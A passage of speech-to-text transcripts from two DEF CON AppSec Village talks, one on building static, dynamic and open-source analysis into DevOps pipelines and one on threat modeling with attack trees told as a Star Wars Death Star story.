world, the static code analysis tools would only report the confirmed vulnerabilities. But even if you tune the daylights out of this thing, you're still going to get false positives. And that becomes a problem. Because originally when we first set up this process, I was the only one that could review the false positives and whitelist them or wave them as it were. That slowed things down immensely because that was not my full-time job. That was something else on top of my full-time job and possibly another full-time job some days it felt like. So that being said, I decided to leverage the security champions. These were folks that had some basic knowledge of security. They knew their applications better than I ever would. And they had a passion for making secure code. Seemed like a perfect fit. So what I ended up doing is I ended up giving several members of the security champions team the ability to review and wave false positives. And that has worked out great. The end result was we've had a lot more throughput. We've been able to address false positives much more quickly. And the adoption of the static code analysis tools have actually increased as a result of not having that delay. So I also see static code analysis as an extension of developer training. A lot of these tools have an IDE component. So for example, I used the Spring Tool Suite Eclipse. And you can use the plug-in and execute your scan from within your developer tool. And it will take you straight to the line that's got the problem. And in some of these tools you can even have recommendations pop up in the bottom of one of the windows that says, hey, you might try blank, blank, and blank to address this vulnerability. If developers are doing this while they're developing, not waiting for the build process, it becomes a teaching tool. Because as a developer uses this, he or she is going to identify and learn that, oh, I need to check my input fields to make sure they're the right type and right size. Okay, you do that enough times. It becomes second nature. So this becomes not only a way to secure your code, but a teaching opportunity as well. So studies have shown that study code analysis can identify up to 80% of vulnerabilities. That's pretty awesome. If I could tell you that you can do one thing and remove 80% of vulnerabilities, I think that'd be worth doing. So this might be something you might want to take a look at. Here's some example products. Here's three products along the top that are commercial. OWAS has an entire list of code analysis tools at that link right there. Again, not meant as recommendations, but these were tools that I've come across in my journeys. And they might be worth at least acting as a starting point for your own investigation. So the second goal in our hat trick, the second piece to the tripod is dynamic code analysis. This was also in this SDLC pyramid. So unlike static code analysis, dynamic code analysis actually executes the code. Now that has a prerequisite that the code has to be compiled and free of errors and can run before you can actually perform the dynamic code analysis. Dynamic code analysis, I mentioned this before, is different than pen testing, whereas dynamic code analysis looks for the flaws in the code that can be exploited. Pen testing looks for ways to exploit the system in general, often at a greater detail and almost always involving a human attacker. So again, two different things, they're kind of similar, but I really think that dynamic code analysis is really at best a subset of a good penetration test. So dynamic code analysis tools can identify up to 85%. But if you combine them with the static code analysis tools on the market, up to 95% of your applications vulnerabilities can be identified early on. 95%. That's pretty darn impressive. So again, I'm going to throw a few products up here for you to take a look at. I've used several of these. Again, not recommendations, but a place for you to start. Give you a word of warning. I think I told you earlier on, I would tell you some things that work and some things that just didn't seem to work quite so well. Some of these tools can be weapons. I'm looking at you, Burp Suite. You need to do things like make sure you set the scope of your testing tool so it doesn't see the, oh, I've got a link to Facebook here. I will jump and follow that link in my crawl and I will start attacking Facebook. Set your scope absolutely to your application only. Run the stuff and test. Don't run it in production. If you find a SQL injection exploit and you start to execute it, it's very, very likely that you're going to corrupt or lose data on the database on the backside of that injection vulnerability. Also, watch out for forms. So let's say you're doing some dynamic testing and it's automated and you're getting ready to essentially attack a web form. Make sure you find out where that web form is going before you start your test. You can easily overrun a service desk by submitting thousands upon thousands of emails from a web mail form. Not saying that I've ever done that, but I know that it has happened. So the third goal in our hat trick is open source analysis. Open source is awesome. We all use open source. Some estimates put the percentage of open source in internally developed applications at 70%. That's 70%. Now, the problem with that is, as a result, about 50% of our applications contain one or more open source pieces that has a high security vulnerability. Keeping that out of production is a huge, huge task. There are two different approaches I've taken when I've tried to address this problem. The first was a firewall slash proxy solution. There are products out there that you can actually set up that will proxy the main repos out in the wild. They'll check as you pull down code libraries. They'll check them for license compliance. You can say, hey, I'm okay with this license, this license, but I don't want that license. You can set that up ahead of time and it will check each time a module is pulled down that it is in compliance with your licensing. But more importantly, you can also set a vulnerability threshold. You could, for example, say, hey, I don't want any critical or high translation. I don't want any CVE7 or higher coming into my organization's local repository. The problem with that is a lot of the tools that developers use, particularly in DevOps, for automating building of systems, automating testing, have vulnerabilities because they really weren't meant to go live anywhere. They were basically developer aids, developer tools, and your policy is going to quarantine or prevent them from coming into your local repository. The result is you get a lot of phone calls. Hey, this module, I need it, I need it now, and it's quarantined. Well, that requires getting out on the firewall of proxy and looking at what's quarantined, determining how it's going to be used, where it's going to be used, and does that CVE apply in this use case, and then deciding whether you can waive it or not. It is a labor-intensive process. I didn't really like doing it this way at first. So I ended up moving to a build-based solution. Build-based solutions are very similar to what we're going to see in just a few minutes, where you basically add an open-source view step to your automated build process. If you find that same vulnerability as it's going to production, let's say it's a CVE of eight, and it's going into production, you fail the build. At that point, the developers have the opportunity to go, okay, I need to get a security waiver, or I need to find a more recent or a more updated library that doesn't have that CVE as an outstanding issue. So this ended up reducing the manual intervention. The only problem is you could end up having something on your internal network with a CVE of seven or higher. That's a developer tool. You've got to be very careful when you're whitelisting or removing items from quarantine to understand how it's going to be used and if the CVE itself can be exploited in that manner. So here's some products once again. OWAS, I've mentioned them several times, great organization. Again, these are not recommendations. These are simply places for you to start if you haven't looked at these already. And finally, let's talk about automation. So those last three steps, they seem like a lot. And originally, we were doing them manually, and it became unwieldy very quickly. It just took a lot of time. It took a lot of effort. So what we were able to do was automate most of this into the build pipeline. So if you have a continuous integration tool, something like Jenkins, you can add steps that execute static code analysis, dynamic code analysis, and open source analysis with every build. So this gives you all of that protection over 95% from the studies with every single build that you do. Now there's some things that are just too stinking big. So if you're still dealing with legacy applications, you go monolithic jars and ears. If you've got something that's somewhere in the line, you know, hundreds of thousands of lines of code, sometimes close to a million line of code, this is not going to go well for you. Because the dynamic scan, the static scan, those pieces are going to take a long, long time. I tested one application for a friend of mine just off the just to try it. It was a legacy application. And the scan for just the static code analysis piece took over 12 hours. You can't stop a build for 12 hours and expect the developers not to be concerned. So I don't recommend this for large applications. If you do, you might do it as an asynchronous build step. So basically it says, hey, I've got to go do static code analysis, I'm going to launch it, and then I'm going to continue with my build. You lose the advantage of being able to block at that point. But you still have an automated scan going along. You'll need to have a process in place to alert the development team as well as information security of the results of that scan and then decide how you want to react. But you lose the ability to block. But fortunately, the industry is really moving towards smaller builds, APIs, microservices, things like that. And inline scans are very, very possible. They're very fast. These tools are tuned for this kind of work. And they run incredibly, incredibly fast. Just aside, some of the tools are still working on their automated pipeline plugins. So if you are looking at any of the tools, whether it's the ones I've mentioned or something else, make sure that you ask about the maturity of their continuous integration pipeline plugins. Otherwise, you might find yourself stuck manually doing these for a while until you can find a way to do that. I'm going to end with a couple of final thoughts. So the keys to success, hopefully you can read this. They are start small. Do one thing. For me, it was starting with a training program that literally led to everything else that you saw in this presentation. And as you saw in the presentation, this stuff tended to feed upon itself. The development led to more developer training, which led to a security program, which led to so start small, and it will all come together. Get management buy in by both information security and by app sec management. The centerpiece right there, that has to be the key for me. It has to be fun. When this stuff is no longer fun, I'm not going to do it anymore. We've got to keep making it fun, particularly for our developers. Developers are doing a lot of stuff, adding security on top of everything else they're doing is a pain in the butt. And for the most part, it's not welcome unless you can make it fun. If you can make it fun, it's going to happen. So just like we just mentioned, automate everything you possibly can. And remember, it's all about those relationships, the relationships with your scrum teams. It's the relationships with your developers. So relationships with your vendors and the trainers that you can get to come in. So building a good relationship is key. Don't try to reinvent the wheel. The best innovation is usually stolen from somewhere or given from somewhere. So if you can take one piece from this discussion and implement in your organization, I will feel blessed. I'd love to hear about it. Take it slow. This stuff is new for all of us and it's always changing. And finally, learn what works best in your environment. So I want to wrap up with thank yous. I want to thank you for spending the last 40, 45 minutes, whatever it ended up being with me and with AppSec Village. I want to thank AppSec Village. I got to volunteer there last year. I ended up spending the entire DEFCON there. After I think that was my sixth year in information security, I finally found my home and that is the AppSec Village. So thank you to the leadership of AppSec Village for doing this and for giving me this opportunity. I want to reiterate my thanks to Jim Manneco and he's kind of been my spirit leader on this journey and I appreciate all you've done. My colleagues Barry and Shane, my partners in crime, you guys are awesome. And finally, my best friend, my wife, who's put up with me, put up with me doing this and several other things in information security. She's absolutely the best and I can't thank her enough. So thank you guys very much. I appreciate you spending this time with me and I hope you have a really, really excellent rest of your DEFCON. Thanks.
|
The DevOps & Agile Security Toolkit - In this talk, we will look at integrating security into Agile and DevOps. We will discuss strategies, training, tools, and techniques that will let your organization move quickly while doing so safely.
|
10.5446/51610 (DOI)
|
Here we are, the end of day one. Our final talk, something that I've been super excited to hear about. But before we get to that, again, if you haven't gotten a t-shirt, head out to the AppSec Village website, you can pick up a shirt there. And let's give a big thumbs up to everybody who helped to put this on this year. This is fantastic. Definitely want to thank everyone. The next speaker, Mario Areas, is going to talk about threat modeling the Death Star. Which what a better model that can we use, right? Mario is a software developer with ten years of experience in four different countries. His expertise involves security, dev ops, and agile practices. Mario helps teams to deliver value quickly while keeping applications, infrastructure, and data safe. With that, let's welcome Mario to the stage. Hello everyone, welcome to my talk, threat modeling the Death Star. My name is Mario, I have been a software developer for over ten years. And recently I have moved to be a full-time security engineer two or three years ago. And today, nowadays, I'm a software engineer again. Today I want to talk about threat modeling. And threat modeling is a subject that feels very important and is very dear to my heart for many different reasons. But the main reason is a reason that was shown on the state of dev ops report from last year. So the state of dev ops report is a report done by puppets and different companies where they look, survive different companies and they try to get information about how efficient they are in a dev ops world. And one of the things they look at is security. And they have like looking at all different companies on all different sizes is the most effective way to improve your secure posture is to do secure collaborative threat models with the security team and the dev team. That's really, really important to improve your secure posture. And that's what I have seen my experience as well as a security engineer. Every time I introduce threat modeling to a company or to a team, I could see the benefits of it very quickly, like the improve of the security posture. But before we're going to jump in and go more into the details about threat modeling, I want to talk a little bit what the definition is, right? And if you look, if you try to Google it, you're going to see like many different definitions, but these ones are like the best. Is that threat modeling is a process to identify enumerate threats. That's what trend modeling is at the end of the day, right? And that makes a lot of sense for security people. But then when you try to go to not secure people or not try to modeling nerds, they don't get very impressed, right? It's a very dry concept. It's a very abstract concept. And it's really hard to engage people who are not from security to actually understand and get involved with the threat modeling. And that's a hard situation, isn't it? Like where you have threat modeling brings so much benefits to the organization, but in the other hand, it's really hard to gather people to do it. And that was my position a few years ago and try to introduce threat modeling in a company. And I really knew that like threat modeling is quite important. But I also knew that's not very engaging at all. I was trying to find a balance where I could reap the benefits of threat modeling while making sure people were motivated enough to engage and participate in the process. That's not only more of one checkbox that you need to do at the end of the day, right? Anyway, then I come up with a list of requirements. What the requirements are. The requirements are something like I felt if there wasn't there for the threat modeling process, they wouldn't be very successful. I wouldn't think that actually is something that's available to the company. And I come up with three different requirements, right? One is it needs to be engaging, threat modeling definitely needs to be engaging. It shouldn't be another boring meeting people need to attend. It should be something like more fun and more engaging so people can go have a good time at least in the threat modeling session. It needs to be highly collaborative. Again, the magic of the threat modeling happens when you get the security doing it and the development team is doing it as well together and collaborating against the process done. It's not like a process for me was a known goal, a process where the security team did it behind the scenes and they just return a report to the development team. Definitely wasn't something I wanted to do it. And finally, it needs to be valuable for everyone. It sounds like a bit silly, but it's very easy for people to think like I'm doing this threat modeling just to make sure the security team is happy and I could do my stuff. That's not the idea that I want to do for the threat modeling. I want it something that if people are participating, collaborating, they could get something out of it. They could understand the process and see the value of it and then do it again and again. Not only because security team wants to have the software more secure, because they also see value and they also want to get their software more secure. And then I look at very different methodologies. I look at stride, I look at pasta, I look at many others, but the software methodology that I like the most is attack trace. I think that resonates well with me, my experience and resonates very well with the teams and companies I have worked for where I introduced that. I really like the way it goes, it's very simple and it's very easy to do it. That doesn't mean it's the best methodology for everyone. Different people have different styles, different companies have different cultures. You might find something different for yourself. But for me, that was very like when I saw the attack trace, I really understood the concept. They really could see that being rolled out to the company. But before I actually tried to do the role for the company, I did a pilot first. I chose a few selected teams, they were doing some interesting work and they were trying to model all the great value at the phase of the work. And with that, I talked to them, I did some pilots, I did a few trial models and then I did the survive at the end of it to see what people think about the process. And I really asked them to be very honest because if it wasn't working for them, chances are it wouldn't work for other people in the company, so it wouldn't be successful and we should just start from scratching and rather than try to roll out that process. And the numbers I got were very positive, let's say this. 80% of developers found useful, they found valuable and they would participate again. For me, the participants again was the ultimate metric. If they would participate again, it's because I hit the three requirements, they saw value in it, it was collaborative and was engaging. And they see value, they actually saw value for them and they wanted to do it again. So that makes me feel confident and then I did roll out that to the rest of the company. And I'm going to want to talk about that, what's the process I did roll out, but I want to use Star Wars for that. Because again, Treadmalling is very dry, it's a very abstract concept, so I always try to get different ways to make Treadmalling a bit more engaging. And Star Wars is one of the funnest ways that I have seen so far. So let's start with Star Wars. And that story starts with yourself, the audience watching this at this point, where you are the new CSO of the Galactic Empire, Chief Security Officer. Well done. You start as a low-level stocktrooper fighting the trenches against the rebellion and you made all your way to the top. Now you're a Chief Security Officer. Well done. But not everything likes Quarfrick, isn't it? That guy now is our new boss. Yeah, and how can I say this? He's a very different style of leadership. This whole thing you know you learn about today, blameless culture or servant leadership, stepping on something he believes in. He's more like an old school kind of guy. He really thinks high accountability is the way we're before. But that's okay, right? Everybody had some problematic boss at some point in their careers and pretty sure you can work around the guy. And you have been like a CSO. You start to look at the crown jewels of the Empire. What's the most important assets and what do you need to protect for before everything else? And the answer was very easy and very big as well. The answer was the Death Star. It's the most expensive project in the whole Galactic Empire. It costs around like 2 trillion credits. It's been 20 years in the making. It's the biggest weapon of the galaxy and like a major strategic asset for the Galactic Empire. So definitely that's the way you need to focus on. However, it's a project that's been like any waterfall project. They had like over budget and overdue and the business was not happy with it and the business would like to release that as quickly as they can to productions being like delay and delay and delay for over too many years. So your boss and the Emperor are now very happy. But that's fine. You can work with that. You're a professional, right? Okay, so you've got to identify already what you need to protect. That's the Death Star. It's a good first step. But you need to have some sort of understanding what kind of a different star is going to happen, like what kind of attacker is going to happen. And you use a simple exercise called like evo personas. The Galactic Empire has been attacked for too many years already. So you kind of know exactly what kind of attackers the Empire can have. So let's talk about it because we need to protect the Death Star against them. And the first one is very interesting is the Charger of Bicks. Charger of Bicks just represents a class of attackers where they don't know very well what they are doing. They don't have too many resources. They also are very competitive. So they keep him like trying to show their colleagues how good they are. Sometimes it can be annoying for the Empire, but honestly when it comes to the Death Star they are not very important personas. So although it's good to list them, but it's not very good for the modeling for the Death Star. So just move to the next persona. Now we're going to talk about Han Solo. And Han Solo is a very interesting persona because Han Solo has a lot more expertise. Han Solo knows what they are doing and any other world hunters, they know what they are doing. They have more resources as well. They have more of their own ship. They might have different weapons. But then again, they are there for the money and they don't organize themselves very well. Bald Hunters are very competitive as well. They keep trying to go to the easy prey and get some easy money, but they don't try anything too big or anything like that. Before coming to the Death Star, it can be annoying, but on the other hand they are probably not a big threat as well. But these people can be problematic. Jedis, first their expertise is huge. Well not only because they have been training for many years, but because they have magic and they are favo. How can you defend against magic if you have a guard and they just didn't see me or whatever? It's really hard to defend against them. Lucky you, it seems your boss managed to kill most of them years and years ago. And the ones out there are probably hidden and they are not much of a threat anyway. So although you list them as a threat, because they are very unlikely to show up and it's very hard to protect against these people, you also don't focus them very much. You trust your boss very good job and eliminate them. Then I talk about more interesting personas when it comes to the Death Star. And here we talk about insider threats. But honestly insider threats should be many different personas because the Empire has many different levels, ranking levels. A strong trooper that's inside the threat is not as dangerous as a C-Lab executive like yourself becoming inside the threat. Regardless of their position though, they have been trained by the Galactic Empire. So they have a strong training and they know what they need to do. They are very good at what they do. They might have resources, a bit of an interesting thing. If you are a strong trooper, you don't have much money, but if you are a C-Lab executive like yourself, you have lots of money, lots of resources. For regardless again of their position, they organize themselves pretty well. The Galactic Empire is a military organization. So they organize all the insider threats. They can join terrorist groups, they can form their own terrorist groups. So they can become a problem because they organize themselves very well, even if they are at a low level, a strong trooper. But the most important persona for the desktop is Princess Leia. Princess Leia represents the rebellion. Rebellion, as you well know, is a terrorist organization trying to bring trouble to the Galactic Empire. Where the Empire is just trying to make the Galaxies stable, you know, a bit of order here and there. But although they are terrorist organizations, they have lots of expertise. They have pilots, they have diplomats, they have spies, and they are very good. They can sometimes go toe to toe with the Galactic Empire. So they do have a lot of expertise. Even for terrorist organizations, they have lots of resources. You are not quite sure where they get the money from, but they do get lots of money. They have small army, they have ships, they have bases across the galaxy. So they have lots of resources. And for terrorist organizations, they organize themselves pretty well. They have become a major pain for the Galactic Empire in the last few years. Sometimes shutdown like Empire operations or shutdown entire armies. So definitely Princess Leia is your most important persona, the one you need to look after. Cool. So that's the summary of your personas, right? From Skiddy-Kiddy, going to Bota Hanta inside the Threat, Jedis, and even Princess Leia, the rebellion. Now going back a little bit to the real world, personas, if you want to do that in your own organization, if you are a large organization, it shouldn't be very hard for you because your organization probably has been attacked before. So you just talk to the security team, you know, in our company, the ones who look more incident response, they might have like an idea of kind of attackers you have. If you on the hand like working for a smaller company, you might try to look at other websites and find like places where they define generic attackers, the style of them, and then as you grow, as you scale, and then have like real attacks, you can like tweak your personas as you go. But it's important to have like a kind of understanding of the attackers and not keep only on the abstract level of an imaginable attacker. Go! So now you have the asset that's a Death Star, you have the personas, so now it's time to build an attack tree. And the first thing you need to do is get the right people in the room. And remember when my first slide was talking about like, alternate molly should be collaborative exercise and everybody should participate together. So that's what you try to do. You try to get ever-boring at the room so you could run the exercise. You got the Death Star, designers and architects. You got your own team. You took so much trouble to go through that because imagine it's really hard already to go into the time zones and book everybody in the same time when you're across the galaxy where time zones are not even the thing. Because somehow you manage, you put everyone in the room, you even got Darth Vader to do an introduction for the meeting, to give some motivation for people, you know, like the kind of sea level introduction. And then you start to run the attack tree session. And the attack tree session starts like, if the root node is kind of the attacker goal, right? The attacker wants to do an easier asset. And you could look at very different kind of attacks. For example, if you look Han Solo, an unbolted hunter, when he looks at Death Star, he's probably like trying to make some money out of it. He might steal some weapons, he might steal food, I don't know, they might have like, steal lots of stuff. But then you need to look and focus on what's most damaging for the Galactic Empire. Even if Han Solo manages to steal a bunch of weapons or a bunch of food, that really doesn't impact very much the Galactic Empire. It's annoying for sure, but it's not much of a big problem. So when you come up with two different like attacker goals, they're very, if the attacker managed to accomplish this, it can be really damaging for the Galactic Empire. So you're going to focus on that one. And there are two kind of goals that you need to look at, is take control of the Death Star or take Death Star out of action. And take control of the Death Star, it will be really, really bad. Imagine like going to 20 years of project, release that production just for some kind of attacker, get that weapon from you and use it against the Empire. It will be terrible. But as well, it will be very unlikely for the kind of attackers you have, because none of them have the resources to actually manage a ship like the Death Star. You need to have like one million crew inside the Death Star. So to manage the whole thing, you need to have like a very specific expertise and there's lots of proprietary technology. So even Prisces Leah wouldn't be able to take Death Star out of the Galactic Empire and use it against the Empire. But they definitely, definitely can look at the Death Star out of action. That's probably what would be the first goal is as soon as they know about the Death Star, they try to take out of action and take disadvantage, the Galactic Empire is beauty out of the game. So we're going to focus on that. And also we're going to focus on Prisces Leah as a persona, but she's probably the one who can actually accomplish this. Cool. So we chose that, take Death Star out of action. Now we need to think about how would you try to do this, right? How would you accomplish the Death Star out of action? So that's where the collaboration and the magic happens. The security, some ideas, the developers throw other ideas and then you try to figure out which one of these nodes are more likely to happen. And when you go to everybody in the room, there are two kind of nodes that show up, they're really important, and then they're more likely to happen. One is disable the Death Star. I'm going to talk about a 15 minutes disablement or maybe turn off the power for 15 minutes or something like that. I'm talking about some sort of disablement that is so dangerous, so problematic that probably the Death Star is not usable anymore. You need to rebuild the Death Star for it's correct so you can disable it. So it can re-enable again. So it's kind of disablement, but it's probably better to create another one rather than fix it. It's like, same like you break your iPhone screen, for example, it's so expensive they're most likely to just buy a new one. And the other one is destroy the Death Star. So it's usually destroy the whole thing, explode the PC or whatever, so that the two main ways you can take the Death Star out of action. So let's focus a little bit on disable the Death Star. To disable the Death Star, you'd have two kind of nodes as well, two different ways to do this. One is what we call like assistant failure, and the other one is mechanical failure. And assistant failure is mostly like, for example, you disable the navigation system, you disable the heating system, you disable the engine system, you disable such a way to score critical systems that they might cause like a chain reaction and the other systems and like shut down the Death Star. Or you can call some sort of mechanical failure and then you can call some problem on the hardware itself. And the hardware can cause, again, another kind of chain reaction that's going to cause the whole Death Star to shut down. So how would you accomplish these things? And then for assistant failure, you need to compromise a critical AT system. And for the mechanical failure, you need to overload the critical infrastructure. Let's elaborate that a little bit. So there are many systems running inside the Death Star, right? And they manage some sort of critical infrastructure. So if you have access, if an attacker has access to this kind of systems, they can do some damage. But usually the system protects against like problematic parameters or problematic variables or any dangerous kind of action. So what you want to do is what an attacker needs to do is not only have access to these systems, they need to compromise so they can bypass these kind of protections to cause assistant failure. When it comes like to mechanical failure, you might overload some critical infrastructure. So you might overload the HITI system somehow. And to overload the HITI system, you might cause all the hardware to have problems, right? Or you can cause like the Death Star to be very uncomfortable to stay with. People need to leave the ship. So there are different ways you can do that. But the interesting thing is, regardless if you're trying to compromise the critical HITI system or overload the critical infrastructure, you need to have access to the internal network. That's no other way. So either to like have access to sensitive areas of the Death Star, you have this kind of action, you need to have this kind of privilege, or to compromise the critical HITI system, you need to be inside the network so you can interact with the system, right? And it is an internal network because if you think about it, Death Star is just a weapon, right? It's not like they make the system public so people can access. They're not a service, right? They're a weapon. And as a weapon, they hide everything as much as they can. So in order to get like a privilege access, you need to be inside the internal network. Something that's public is probably like not very important and segregated from the other internal network. And in order to get access to the internal network, you need to be inside the Death Star. There is no other way. And then again, Death Star is a weapon and they don't expose my systems to the outside world. And they segregated that stuff very well. So you need to be inside the Death Star so maybe you can go to a server room or steal some kind of employee badge or biometrics or whatever so in order to get your privilege access. The interesting thing is we could go in more detail and like how would you get physical access to the Death Star? But as I said before, the Death Star has one million crew, right? Like it's very likely that an attacker like Princess Leah is going to be able to do that. And if that's not true, another attacker that we have is an internal attacker. So it might be a person who actually has rights to be inside the Death Star and then inside the Death Star to try to do some malicious. So we're going to stop this part of the attack tree here and go to the next step. So that's all we have so far. So we have like take the Death Star all the action. You have disable the Death Star and then you have system failure and mechanical failure and so on and so forth. But this is only one part of the attack tree, right? We have the other one where you want to destroy the Death Star. So how would you do that? How would you destroy the Death Star? And there are basically two ways to do this. One is big military attack. The Death Star is a big weapon. It's a huge weapon. It can cause lots of damage. But also it's still vulnerable to kind of military attacks. So yeah, that's a way to do it. And there is another way that you figure out on the Treadmall and you are like so proud that you actually got that. There is a reactor inside the Death Star. The very core of the Death Star, there's a reactor which controls everything and provides energy for the whole ship. But the reactor is very, very hot. So it needs to send this heat to the space. And the way to do that, the build ventilation tunnels that go from the core straight to the ship, to the top of the ship. So then the heat can dissipate, right? But this is also a vulnerability because now we have a straight path to the core and the core is very unstable. So anything that goes there, any kind of explosion, can cause a chain reaction that can pull the whole Death Star, right? It's a really big problem in case an attacker can exploit this. But there are some sort of protection, let's say this. The first one is obscurity, right? This kind of port is not very like, you need to know where the port is for one. Death Star is huge and there is no easy way for an attacker from outside to know where they should hit. And second, the port is very small. It's only two meters wide. So it's really hard for any kind of pilot to send a bomb over there. So it's not like it's very likely that to happen, but still, not really great. So in order to destroy the reactor, you need to shoot to the thermal port. And to shoot to the thermal port, you need to know where the port is, right? So you need to obtain the Death Star plans. You need somehow know what the port is so you can go there and shoot it, right? And that's the second piece of the attack trees. So together with the first part of the attack tree and the second part of the attack tree, that's what we found out about the main problems with the Death Star design or the procedures we have in the moment. And these are the main goals that the attacker can try to accomplish. So if you get access to privilege access to network, that's going to be a problem. They have different ways where they can accomplish the disablement of the Death Star. A military attack, really huge, but something that a rebellion can't pull out. So if you do not prepare, the rebellion can try to destroy the Death Star by a huge military attack. And finally, the thermal port. If somehow an attacker can shoot at the thermal port, they cause a chain reaction and then they can destroy the reactor and the Death Star altogether. That's good. So that was part of the try them all in and then you figure out some threats. And the way I like it, why I like the attack trees is because it's a problem solving exercise. And everyone in 90 has this kind of mindset of problem solving. We have a problem and try to solve it. That's how we do it, right? That's how we operate it. But rather than use this to build stuff, now we have to change the mindset. And say like, now rather than use your problem solve to build, you're going to use your problem solving skills to attack. That's really, really powerful to get these kind of people, usually don't think about attackers or attacks at all, thinking about these things. And it's interesting to see how they can find vulnerabilities on their own design. And it's very interesting as well because they are collaborating on the session. When you need to go back to them and say, hey, remember that vulnerability we found, we need to fix it. They are not the contest. They were dead. Maybe they were the ones who found out anyway. And they are the ones who know to fix it easily as well. So it's a really interesting exercise. And it's really, really powerful the way we can get people who never think like about attackers try to think like this. It makes them think they look at their system in a very different way. And they only can cause good things because they know to fix the problems and make the system more secure. Cool. Now you have identified the risks and the threats. So now we need to mitigate those. And the first risk we need to mitigate is privilege access to the internal network. And the impact, impact for that is high. If an attacker actually manages to do this, it can be really problematic for the empire. The likelihood we put as a medium because it's not very easy. You need to be inside the DevStar. But the DevStar and the network of the DevStar is not very secure. The rebellion has been hacking the Galactic Empire for many years. But you are a good security professional, aren't you? So you come up with some measures that can implement the network, some quick wins, some testing, and then you like to harden the network and make a lot harder for the attacker to get like a privilege access to this. So after this work has been done, you actually manage to improve the likelihood for medium to low. The impact is too high though. It's really hard to make sure the impact is going to go down. So at least it's unlikely that it's going to happen. Next one. The next one is a military attack. And then again, the impact is really high. If a rebellion can pull out an attack, then it can destroy the DevStar. That's really, really high impact. But the likelihood is also high. Why is that? Because if you are Princess Leah and you get to know that your biggest adversary has such a big weapon, you probably want to go and try to attack them first. But there is a few things you can do to mitigate their risk. The first thing is you need to come up with ways for the crew to respond to attacks very easily, very efficiently. So you define the run books, you make sure people keep on the call and keep on training and keep like make sure this exercise has been running. So when the actual real thing comes, the response works very well. But not only that, the DevStar is going to need some support. So that's why you get like a Star Destroyers. Star Destroyers are like very big other big ships of the Galactic Empire. Even if they are close by when the DevStar is being attacked, they can provide really helpful and strong support and probably make like less likely of the rebellion to attack the DevStar when they have like a strong support as they start destroyers. And finally, you do not try to monitor the rebellion activities, right? If they try to pull out that kind of attack, it's a huge movementation and they need to talk to so many different people and a lot of coordination. So if you get some sort of signal out of them and then you interpret that, you can prepare before they actually pull out the attack. So it would be a lot more prepared when they come. So for this, you manage to get an impact from high to medium because even if the rebellion tries to attack with a strong military attack, you'll be a lot more prepared and maybe you can either defeat them or at least have by enough time to get the DevStar out of that. So that's a good outcome. And the likelihood of it is also medium because if the rebellion cannot actually destroy the DevStar, they are most likely not tried to attack. They only go for the victory, right? So if the victory is not certain, they'll probably not be able to do it. But regardless, you need to be prepared and then that's what you did. Very well done. And finally, shoot at the thermal port. And the impact, again, is high as the other risks. If somebody managed to shoot at the thermal port, you destroyed the reactor, you destroyed the DevStar. And the likelihood was low. And you didn't like how this outcome was low. And why is that? People are saying likelihood is low because you need to know where the port is. And even if you do, it's a really difficult and hard shot, right? So you wanted to do a little bit more. You wanted to do some sort of protections. And maybe it calls like if an attacker is coming, just close down the door or open different ones or have different levels of protection, you try to argue for that. But remember, I was talking in the beginning, the project was being delayed for so many years already. The budget is being over for many years as well. So the business didn't want to go back to the design, redesign the kind of ports to make sure it's more secure and then implemented. That delayed the project for a few more years. And so the business decided to accept the risk. So, but yet, you would not try to do something, right? So at least you're going to try to hide the DevStar plans. So if one of the things they need to do in order to shoot at the terminal port, you need to know where the port is. So at least you try to hide it and make it harder for the attacker finds out about the DevStar plan, sorry, about the DevStar port. Then you wouldn't be a problem anymore, right? Oh, at least you would mitigate to a certain level. That's the only thing you could have done. So you did. And then you went to your own with your life, right? You did the best you could. Then you look at different other areas of the security of the Galactic Empire and you hope for the best. And then eventually the DevStar has been released and the DevStar has been like a cause of joy for the Empire. They cause lots of trouble for the Galactic Empire. And that happened. The DevStar was destroyed, which is not a good outcome for anyone in the Galactic Empire. But you are a professional, right? So what you do in that situation? Forensic analysis. So you try to figure out what went wrong, how the rebellion managed to destroy such important weapon. And the answer is this guy. Luke Skywalker. He was the one who managed to shoot the Thermal Port. But there's some interesting things about Luke Skywalker. The first thing is, he's a Jedi, which is interesting because they're supposed to be hiding not actually attacking the Empire. And like before he actually managed to shoot the Thermal Port, he was about to be shut down, but the person who actually helped Luke Skywalker was a bounty hunter. He came up at the last minute and said, look, from, from destroy it, and then Luke managed to shoot the Thermal Port. Which seems interesting because bounty hunters only help, they only work for money, right? They don't realize themselves very well, so why am I Hunter is helping a Jedi? There's another thing that's quite interesting is Luke Skywalker is actually Princess Leia's brother, which makes him like a high-level ranking rebellion official too. So he's not only a Jedi, he's a rebellion official. So yes, interesting. And the worst part of it all, the worst part. Luke Skywalker is the son of your boss, right? Which makes this whole lot more complicated because Luke Skywalker is considering Thermal Attacker now? You don't know. But definitely like knowing your problem and you don't have a good feeling about it, right? That's problem for your boss to take care of his family and his own boss. But yeah, Luke Skywalker is definitely a problem and he was the one who managed to pull the shot. But how Luke Skywalker actually managed to find out about the port, right? And the answer is these two people here, they managed to hack the Galactic Empire and get the plans. And you did a good job, you put your Death Star plans in a very secure location, at least the most secure head of the Galactic Empire. So these two people managed to go to this location, hack into the data centers, install the hard drive and then send the copy of it to the rebellion. You know what's the worst? The worst thing about that is there was no encryption arrest. So they only got a copy of the hard drive and sent to the rebellion. It's not really good. But that's how they did it. So they stole the plans, they sent the plans to the rebellion, the rebellion quickly attacked the Death Star and for a miracle they managed to shoot the Term Report and everything was destroyed, right? Well, I wish good luck for you because now you need to deliver your report for the forensic analysis to your boss. Good luck. Now let's talk a little bit about lessons learned, right? Lessons learned of this story. And the interesting thing is I used this analogy where you found out about the problem of the Term Report at the very end of the design, at the very end of the building of the software, at the very end like before going to production. And then there's a problem that happens like in all companies, you find a secure problem at the very end and then you need to fix it but nobody wants to fix it before it relates to production. So treadmilling is something that you should do early enough. So in the case of the Death Star, if you have done like the treadmilling at the design level when people are about like, design is Death Star and come up with this design of the Term Report, you could have seen it or somebody from your team seen the problem and then you fix the design right there. It's a lot cheaper to fix at the design level or the beginning of the construction or in the case of software, beginning of the coding than actually at the very end. And there's a problem that happens all the time. So if you want to do treadmilling, do early and do often because things change, especially for software. It changes all the time. We pivot, we try implementing new features, we scope certain features. So we need to look at that a certain amount of time. There are always unknowns. In this case, Luke Skywalker was a very unknown. He was at least three different personas. So even though you have treadmilling and have covered some of the risks, you always need to think about it that you might have not seen something or there's some sort of information that you don't have it or that you're connecting it very different way. So it's not because you haven't done treadmilling, it means you're secure. It means you cover some of the worst threats, but that doesn't mean you are very secure. So you still need to do some work on top of it. Treadmobile is just the beginning. And finally, treadmilling must be 